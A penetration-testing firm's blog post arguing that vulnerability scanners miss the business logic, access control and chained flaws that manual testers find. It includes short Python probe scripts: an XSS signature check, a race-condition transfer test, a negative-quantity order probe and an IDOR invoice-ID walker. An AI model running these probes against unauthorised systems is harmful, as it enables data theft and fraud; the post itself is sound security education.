Penetration Testing

Why Automated Tools Are Not Enough

> nessus --scan && echo 'done' # (it's not done)

Peter Bassill · 15 April 2025 · 14 min read
penetration testing · vulnerability scanning · automation · manual testing · methodology

Same application. Two approaches. Wildly different results.

We ran an experiment. We took a real client's customer portal — with their permission — and pointed three leading commercial vulnerability scanners at it. We let them run to completion, collected every finding, deduplicated the results, and compiled a consolidated report. The scanners found 23 issues: some missing security headers, a couple of outdated JavaScript libraries, a cross-site scripting (XSS) vulnerability in a search field, and a selection of informational findings about cookie flags and TLS configuration.

Then a human tester spent the same amount of time — five days — manually testing the same application. They found 11 issues. Fewer by count. But among them: an insecure direct object reference (IDOR) that exposed every customer's invoices by incrementing an ID parameter, a business logic flaw allowing negative quantities that credited money to user accounts, a broken access control that allowed any authenticated user to access the admin dashboard by navigating directly to its URL, and a chained attack that combined the admin access with an unrestricted file upload to achieve remote code execution on the underlying server.

The scanners found 23 issues rated informational to medium. The human found 11 issues, four of which were critical — and one of which constituted a full server compromise. Not a single one of the human's critical findings appeared in the scanner output.

This isn't a failing of the scanners. They did exactly what they were designed to do: identify known vulnerability patterns through automated pattern matching. The problem is that the vulnerabilities which actually lead to breaches — the ones that let attackers steal data, move laterally, and deploy ransomware — almost never match a pattern a scanner recognises.

The Numbers Trap

A scanner report with 200 findings looks more comprehensive than a manual report with 15 findings. It isn't. The scanner has found 200 instances of problems it was designed to look for. The human has found 15 problems that exist in reality — and the 4 that matter most aren't in the scanner's vocabulary.


Automation has a genuine role.

This isn't an argument against scanners. Automated tools are essential components of a mature security programme. They do things that humans can't do efficiently, and they do them at a scale that manual testing can't match.

| Strength | What It Means in Practice |
| --- | --- |
| Speed and scale | A scanner can assess thousands of hosts in the time it takes a human to test one application. For broad-baseline coverage across a large estate — identifying missing patches, expired certificates, and known CVEs — automation is unmatched. |
| Consistency | A scanner runs the same checks every time, in the same order, with the same thoroughness. It doesn't have bad days, doesn't get distracted, and doesn't skip checks because it's running short on time. For repeatable, auditable baseline assessments, this consistency is invaluable. |
| Known vulnerability detection | If a vulnerability has a CVE number and a detection signature, a well-maintained scanner will find it reliably. For patch management validation — confirming that known vulnerabilities have been remediated — scanners are the right tool. |
| Frequency | Scanners can run weekly, daily, or continuously. Human pen tests happen annually or quarterly at best. For catching new vulnerabilities between engagements — a new CVE drops, a certificate expires, a service is misconfigured — automated scanning fills the gap. |
| Configuration benchmarking | Scanners can check hundreds of configuration settings against CIS benchmarks, PCI requirements, or custom baselines in minutes. For compliance evidence and configuration drift detection, automation is ideal. |

These are real strengths, and any organisation with more than a handful of systems should be running automated vulnerability scanning as part of its security baseline. The mistake isn't using scanners. The mistake is believing that scanner output is equivalent to a penetration test.


What scanners fundamentally cannot find.

Scanners work through pattern matching. They send predefined inputs, observe the responses, and compare those responses against a database of known vulnerability signatures. This means they can only find vulnerabilities that someone has previously discovered, documented, and written a detection rule for — and only in contexts where the detection rule fires correctly.
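To make "pattern matching" concrete, here's a minimal sketch of what a signature-based check amounts to. The check definition, target URL, and parameter name are illustrative assumptions rather than any real scanner's internals; the point is that nothing gets reported unless a predefined signature fires against a predefined input.

```python
# Minimal sketch of signature-based scanning (illustrative, not a real scanner).
# A commercial scanner ships thousands of checks like this; each can only
# flag what its signature author anticipated.
import re
import requests

CHECKS = [
    {
        "name": "Reflected XSS (basic signature)",
        "payload": "<script>alert(1)</script>",
        # Fires only if the exact payload is reflected unencoded.
        "signature": re.compile(r"<script>alert\(1\)</script>"),
    },
]

def run_checks(url: str, param: str = "q") -> list[str]:
    """Send each predefined payload and compare the response to its signature."""
    findings = []
    for check in CHECKS:
        resp = requests.get(url, params={param: check["payload"]}, timeout=10)
        if check["signature"].search(resp.text):
            findings.append(check["name"])
    # No check for "can user A read user B's invoices?" exists here,
    # and no amount of signature tuning will create one.
    return findings

if __name__ == "__main__":
    # Only ever point this at systems you are authorised to test.
    print(run_checks("https://portal.example.com/search"))
```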

Here's what falls outside that paradigm — and why these categories represent the most dangerous vulnerabilities in any environment:

| Blind Spot | Why Scanners Miss It | Real-World Example |
| --- | --- | --- |
| Business logic flaws | A scanner has no understanding of what an application is supposed to do. It can't recognise when a workflow permits something that shouldn't be possible, because it doesn't know what "shouldn't be possible" means in your business context. | An insurance quote system where changing the date of birth after quote generation doesn't recalculate the premium. A user can obtain a quote for a 25-year-old, change the DoB to 80, and purchase insurance at a fraction of the actuarial cost. No technical vulnerability — purely a logic flaw. |
| Access control failures | Testing access control requires understanding the application's permission model — which users should access which resources — and then deliberately violating it. Scanners don't understand roles, permissions, or data ownership. | An IDOR where changing /api/users/1001/documents to /api/users/1002/documents returns a different customer's files. The API returns a valid 200 response in both cases — the scanner sees a successful request, not a security failure. |
| Chained vulnerabilities | Scanners assess each finding in isolation. They cannot combine a low-severity information disclosure with a medium-severity SSRF to achieve a critical-severity credential theft. Chaining requires understanding how weaknesses interact — which requires human reasoning. | A server-side request forgery (SSRF) in a PDF export function — rated medium in isolation. Pointed at the cloud instance metadata service (IMDSv1), it retrieves AWS temporary credentials. Those credentials have S3 read access to the backup bucket. Chain: medium SSRF → critical data breach. |
| Race conditions | Exploiting race conditions requires carefully timed concurrent requests — sending two withdrawal requests simultaneously to exploit a time-of-check to time-of-use (TOCTOU) vulnerability. This requires deliberate, context-aware manipulation that automated tools don't attempt. (A minimal test sketch follows this table.) | A funds transfer function where two simultaneous requests both pass the balance check before either deducts the funds. Each request transfers £500 from an account with a £500 balance. Result: £1,000 transferred from a £500 account. |
| Multi-step workflow abuse | Scanners interact with individual pages and endpoints. They don't navigate multi-step processes in sequence, skip steps, replay steps out of order, or modify state between steps. Workflow abuse requires understanding the intended process and deliberately breaking it. | A payment flow where Step 1 selects items, Step 2 calculates the total, and Step 3 submits payment. Intercepting between Steps 2 and 3 to modify the total to £0.01 while retaining the original items. The payment succeeds because Step 3 doesn't re-validate. |
| Authentication bypass through design | Scanners test login forms with standard credential attacks. They don't examine whether the password reset flow leaks tokens, whether OAuth state parameters are validated, whether MFA can be bypassed through API calls that skip the front-end, or whether session tokens are predictable. | A password reset endpoint that returns the reset token in the API response body (not just in the email). Any user can request a reset for any account and intercept the token from the response, resetting the target's password without access to their email. |
| Context-dependent injection | Scanners test for SQL injection by sending standard payloads to standard input fields. They miss injection in unconventional locations — HTTP headers, JSON values, serialised objects, file upload metadata, WebSocket frames — where the same payloads behave differently. | SQL injection via an HTTP request header (X-Forwarded-For) that the application logs to a database without sanitisation. The scanner tested every form field but never tested the headers — because headers aren't "input fields" in the scanner's model. |
| Social engineering susceptibility | No scanner can phone your helpdesk and convince them to reset a password. No scanner can assess whether your staff would click a phishing link, hold a door open for a stranger, or plug in a USB drive found in the car park. The attacker doesn't need a technical vulnerability at all. | A convincing phone call to the helpdesk — "Hi, it's James from the Edinburgh office, I've been locked out" — results in a password reset. The helpdesk agent follows the process they were trained on, which doesn't require caller verification. |
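For the race-condition case above, here is a hedged sketch of the kind of concurrent-request test a human runs. The transfer endpoint, request body, and session token are hypothetical placeholders; the technique is simply firing two requests close enough together that both pass the balance check before either write lands.

```python
# Minimal sketch of a manual race-condition (TOCTOU) test: submit two
# transfer requests concurrently and see whether both are accepted.
# Endpoint, request body, and token are hypothetical placeholders.
from concurrent.futures import ThreadPoolExecutor
import requests

TRANSFER_URL = "https://portal.example.com/api/transfer"  # assumed endpoint
HEADERS = {"Authorization": "Bearer REPLACE_WITH_AUTHORISED_TEST_SESSION"}

def transfer(amount: int) -> int:
    """Attempt a single transfer and return the HTTP status code."""
    resp = requests.post(
        TRANSFER_URL,
        json={"to_account": "test-account-b", "amount": amount},
        headers=HEADERS,
        timeout=10,
    )
    return resp.status_code

if __name__ == "__main__":
    # Fire both requests at effectively the same moment so each reads the
    # balance before either write lands. Two successes from a £500 balance
    # indicates a time-of-check to time-of-use flaw.
    with ThreadPoolExecutor(max_workers=2) as pool:
        print("Status codes:", list(pool.map(transfer, [500, 500])))
```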

What a skilled tester actually does.

The value of a human tester isn't that they run better tools. It's that they think. They read the application, understand what it does, form hypotheses about what could go wrong, and test those hypotheses with creativity and persistence. This cognitive process — adversarial reasoning — is what separates a penetration test from a vulnerability scan.

| Human Capability | What It Looks Like in Practice |
| --- | --- |
| Understanding intent | The tester reads the application and understands what it's supposed to do: "this is a portal where customers view their invoices." From that understanding, they derive what shouldn't be possible: "a customer should not be able to view another customer's invoices." They then test specifically for that violation. |
| Creative hypothesis | "What happens if I submit a negative quantity? What if I change my role in the JWT? What if I replay a payment request with a modified amount? What if I upload a PHP file with a .jpg extension?" Each of these is a hypothesis that no scanner would generate — because each requires contextual understanding of the application. (A sketch of this kind of probing follows the table.) |
| Chaining and escalation | The tester finds a low-severity information disclosure: an error message reveals an internal IP address. They find a medium-severity SSRF. They combine them: the SSRF, directed at the internal IP, reaches an unauthenticated admin panel. Individually, minor. Combined, critical. The tester sees the chain because they hold the whole picture in their head. |
| Adversarial persistence | A scanner tries a payload, gets a negative result, and moves to the next check. A human tester who suspects a vulnerability is present tries again with different encoding, different context, different timing. They adjust their approach based on the application's behaviour — learning from each response. |
| Contextual risk assessment | A scanner rates a finding by CVSS — a generic severity score. A human tester rates it by business impact: "this XSS is stored in the support ticket field. When an admin views the ticket, the attacker's JavaScript runs in the admin's browser, stealing their session. This turns a medium-severity XSS into admin account takeover." |
| Narrative reporting | A scanner produces a list of findings. A human tester produces an attack story: "starting from an unauthenticated internet position, we chained three vulnerabilities to achieve remote code execution on the production database server within four hours." One goes into a remediation tracker. The other goes to the board. |
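As a flavour of the "creative hypothesis" row above, here is a small sketch of hypothesis-driven probing: submit inputs the intended workflow never produces and note which ones the server accepts. The order endpoint, field names, and token are assumptions for illustration, not a prescribed tool.

```python
# Minimal sketch of hypothesis-driven probing: send inputs the intended
# workflow never produces and flag any the server accepts for follow-up.
# Endpoint, field names, and token are illustrative assumptions.
import requests

ORDER_URL = "https://portal.example.com/api/orders"  # assumed endpoint
HEADERS = {"Authorization": "Bearer REPLACE_WITH_AUTHORISED_TEST_SESSION"}

HYPOTHESES = [
    {"label": "negative quantity credits the account",
     "body": {"product_id": 101, "quantity": -1}},
    {"label": "client-supplied total is trusted at checkout",
     "body": {"product_id": 101, "quantity": 1, "total": 0.01}},
]

if __name__ == "__main__":
    for hypothesis in HYPOTHESES:
        resp = requests.post(ORDER_URL, json=hypothesis["body"],
                             headers=HEADERS, timeout=10)
        # A 2xx response doesn't prove exploitability on its own, but it
        # tells the tester which hypothesis deserves manual follow-up.
        print(f"{hypothesis['label']}: HTTP {resp.status_code}")
```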

The same application, two lenses.

To make the distinction concrete, here's what the same customer portal looks like through the lens of an automated scanner versus a human tester.

| Finding | Scanner Assessment | Human Tester Assessment |
| --- | --- | --- |
| Missing X-Frame-Options header | Medium — "The application may be vulnerable to clickjacking." | Low — "The application uses CSP frame-ancestors 'none', which provides equivalent protection. The missing X-Frame-Options header is a defence-in-depth gap for legacy browsers only." |
| jQuery 3.4.1 (outdated) | Medium — "Known vulnerabilities exist in this version of jQuery (CVE-2020-11022)." | Informational — "The CVE requires a specific DOM manipulation pattern that this application doesn't use. The library is outdated and should be updated as maintenance hygiene, but the specific CVE is not exploitable in this context." |
| Invoice endpoint accepts id parameter | Not detected — the scanner received a valid 200 response and moved on. | Critical — "Changing /api/invoices/1001 to /api/invoices/1002 returns a different customer's invoice. No authorisation check is performed on the id parameter. All 43,000 customer invoices are accessible to any authenticated user." (A manual test sketch follows this table.) |
| Admin dashboard at /admin | Not detected — the scanner crawled from the user context and never discovered the admin URL. | Critical — "Navigating directly to /admin while authenticated as a standard user grants full administrative access. The application checks authentication but not authorisation for the admin interface." |
| Negative quantity in order form | Not detected — the scanner doesn't test business logic. | High — "Submitting a quantity of -1 for a product credits £49.99 to the user's account. Repeated exploitation allows unlimited credit generation. The application validates that the quantity field is an integer but not that it's positive." |
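The invoice IDOR in the table above is also the simplest to demonstrate in code. The sketch below assumes the article's /api/invoices path, a placeholder session token, and a small trial ID range; it requests a handful of IDs with one user's session and flags any 200 response that isn't that user's own data.

```python
# Minimal sketch of the manual IDOR check described above: walk a small
# range of invoice IDs with one user's session and flag responses that
# belong to someone else. Path, token, and ID range are placeholders.
import requests

BASE_URL = "https://portal.example.com/api/invoices/{invoice_id}"
HEADERS = {"Authorization": "Bearer REPLACE_WITH_AUTHORISED_TEST_SESSION"}
MY_CUSTOMER_ID = "1001"  # the customer this test session legitimately belongs to

def check_idor(start: int, end: int) -> list[int]:
    exposed = []
    for invoice_id in range(start, end):
        resp = requests.get(BASE_URL.format(invoice_id=invoice_id),
                            headers=HEADERS, timeout=10)
        if resp.status_code != 200:
            continue
        # A 200 containing another customer's data means the endpoint checks
        # authentication but not authorisation: the scanner's "valid response".
        if MY_CUSTOMER_ID not in resp.text:
            exposed.append(invoice_id)
    return exposed

if __name__ == "__main__":
    # Only run against systems you are explicitly authorised to test.
    print("Invoices exposed to the wrong user:", check_idor(1001, 1011))
```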

The scanner correctly identified two real issues (the header and the outdated library) — but overrated both. The human correctly identified three critical issues the scanner couldn't detect and provided accurate context that reduced the severity of the scanner's findings. The net result: the scanner report suggests moderate risk; the human report reveals the application is critically compromised.


When scanning replaces testing.

The most dangerous consequence of treating vulnerability scanning as penetration testing isn't the missed findings — it's the false confidence those missed findings create.

"We've Been Pen Tested"
An organisation receives a scanner report labelled as a penetration test. It shows no critical findings. The board receives assurance that the security posture is acceptable. But the report didn't test business logic, access controls, or chained attacks — because no human looked at the application. The organisation believes it's been tested. It hasn't.
"Our Risk Is Decreasing"
Quarterly scanner reports show fewer findings each quarter — patch management is improving, security headers are being deployed, SSL/TLS is being hardened. The trend line looks positive. But the business logic flaw that allows any user to access any other user's data has been present since launch and will never appear in a scanner report.
"We Meet the Compliance Requirement"
The contract says "annual penetration test required." A scanner report satisfies the letter of the requirement. But when a breach occurs through a vulnerability the scanner couldn't find, the question won't be whether the contract was technically satisfied — it will be whether reasonable security measures were in place.
"We Can't Justify the Cost"
A vulnerability scan costs a fraction of a manual pen test. The output looks similar — both produce reports with findings and severity ratings. The difference only becomes visible when the manual test finds the critical issues the scanner missed, or when a breach exploits a vulnerability that was never in a scanner's database.

Using automation and human testing together.

The choice isn't between scanners and testers. It's about understanding what each does and deploying them in combination so that each covers the other's weaknesses.

| Activity | Frequency | What It Covers | What It Misses |
| --- | --- | --- | --- |
| Automated vulnerability scanning | Weekly or continuous | Known CVEs, missing patches, misconfigurations, expired certificates, security header compliance, SSL/TLS issues | Business logic, access control, chained attacks, novel vulnerabilities, social engineering, anything requiring context |
| Manual penetration testing | Annual or before major releases | Business logic flaws, access control failures, attack chain development, novel vulnerability discovery, contextual risk assessment | Breadth — a human can't assess 10,000 hosts in five days. Continuous coverage between engagements. |
| DAST (Dynamic Application Security Testing) | Per deployment (CI/CD integrated) | Common web vulnerability patterns (XSS, SQLi, CSRF) caught early in the development lifecycle, before production deployment | Same limitations as scanning — pattern-matching only. No business context. High false-positive rate without tuning. |
| Bug bounty programme | Continuous | Creative, human-driven testing at scale. Diverse perspectives. Finds issues that internal testing may miss. | Not systematic — researchers focus on high-reward findings. No guaranteed coverage of all functionality. Requires maturity to manage. |
A Layered Testing Programme
# Continuous — automated baseline
vuln_scan --frequency=weekly --scope=all_assets # Known CVEs, misconfig
dast_scan --trigger=deployment --scope=web_apps # Pre-production checks
asm_monitor --frequency=daily --alert=new_asset # Attack surface changes

# Periodic — human-led depth
pen_test --frequency=annual --scope=risk_based # Full manual assessment
app_test --trigger=major_release --scope=changed_app # Pre-launch testing
social_eng --frequency=biannual --scope=all_staff # Phishing + vishing

# Event-driven — as needed
retest --trigger=remediation_complete # Verify fixes
red_team --trigger=maturity_milestone # Full adversary simulation
incident_test --trigger=post_breach # After a security incident

The automated layer runs continuously, catching known issues as they appear. The human layer runs periodically, finding the issues that automation can't. Neither replaces the other. Together, they provide coverage that neither achieves alone.


How to tell if your "pen test" is actually just a scan.

Some providers sell vulnerability scans as penetration tests — sometimes knowingly, sometimes through ignorance. The pricing is lower, the turnaround is faster, and the report looks superficially similar. Here's how to distinguish between them.

| Indicator | Likely a Scan | Likely a Pen Test |
| --- | --- | --- |
| Turnaround time | Report delivered within 24–48 hours of "testing". | Testing takes 5–10 business days. Report delivered 3–5 days after testing completes. |
| Findings format | Every finding has the same structure: tool-generated title, generic description, CVSS score, boilerplate remediation. Often references Nessus, Qualys, or Burp plugin IDs. | Findings are written in prose, with context specific to the application. Attack chains are described as narratives. Remediation is tailored to the client's stack. |
| Evidence | Screenshots of scanner output. HTTP request/response pairs that look automated. | Screenshots of manual exploitation. Step-by-step walkthrough of the attack path. Evidence of the tester interacting with the application in ways a scanner wouldn't. |
| Business logic | No business logic findings. No access control testing. No workflow abuse. | Business logic flaws described and demonstrated. IDOR, privilege escalation, and workflow abuse findings with clear impact statements. |
| Tester interaction | No contact during testing. No questions about the application's functionality. | Tester asks questions: "What's this admin panel supposed to do?" "Which users should access this data?" "Is this test payment functionality live?" |
| Pricing | Significantly below market rate for the scope. Priced per IP or per host rather than per tester-day. | Priced by tester-days appropriate to the scope. A complex web application requires 5–10 days; if the quote suggests less, the testing won't be thorough. |
| Debrief | No debrief offered, or a brief call that amounts to "here's the report." | A structured debrief walkthrough with the tester who conducted the work. Questions answered. Attack chains explained. Remediation discussed. |

The Question That Reveals Everything

Ask your provider: "Can you describe a business logic vulnerability you found in a previous engagement?" If they can tell you a specific story — the application, the flaw, how they found it, the impact — they're doing manual testing. If they can't, or if they redirect to talking about CVEs and CVSS scores, they're running scanners.


Why manual testing is worth the investment.

Manual penetration testing costs more than automated scanning. That's a fact. A typical web application scan might cost £500–£1,500. A manual pen test of the same application might cost £5,000–£15,000. The question is whether the difference in price reflects a difference in value — and the answer is unambiguously yes.

| Cost Comparison | Vulnerability Scan | Manual Pen Test |
| --- | --- | --- |
| Typical cost | £500–£1,500 per application | £5,000–£15,000 per application |
| Critical findings discovered | Known CVEs only — typically infrastructure-level | Business logic, access control, chained attacks, novel vulnerabilities — typically application-level |
| Average data breach cost (UK) | £3.4 million (IBM Cost of a Data Breach Report 2024) | £3.4 million (IBM Cost of a Data Breach Report 2024) |
| Return on investment | Finds the vulnerabilities a scanner can find. Misses the ones that lead to breaches. | A single critical finding that prevents a breach pays for decades of annual pen testing. |

The IDOR vulnerability from our opening experiment exposed 43,000 customer invoices. Had an attacker found it first, the resulting breach notification, regulatory investigation, legal costs, and reputational damage would have dwarfed the cost of every pen test the organisation will ever commission. The scan missed it. The human found it. That's the economics in one sentence.
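As a rough sanity check on that claim, using only the figures quoted in the table above (and treating the £15,000 top of the range as the annual spend):

```python
# Back-of-the-envelope check using the article's own figures.
breach_cost = 3_400_000   # £3.4m UK average (IBM Cost of a Data Breach Report 2024)
annual_pen_test = 15_000  # top end of the £5,000-£15,000 range quoted above

print(f"One prevented breach covers roughly {breach_cost / annual_pen_test:.0f} annual pen tests")
# -> One prevented breach covers roughly 227 annual pen tests
```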


The bottom line.

Automated vulnerability scanners are fast, consistent, and essential for maintaining a security baseline. They find known vulnerabilities at scale and should run continuously as part of any mature security programme.

But they cannot understand your application. They cannot think like an attacker. They cannot chain findings, test business logic, bypass access controls through creative manipulation, or assess the real-world impact of what they find. The vulnerabilities that lead to breaches — the IDORs, the logic flaws, the chained attacks, the authentication bypasses — live in the space between what a scanner can detect and what a skilled human tester can discover.

Use both. Run scanners continuously. Commission manual testing periodically. And never mistake one for the other — because the organisation that believes a scan is a pen test is the organisation that learns the difference during a breach.


Testing that finds what automation misses.

Every engagement is led by experienced human testers who think adversarially, test creatively, and report contextually. Automated tools support the process — they don't replace it.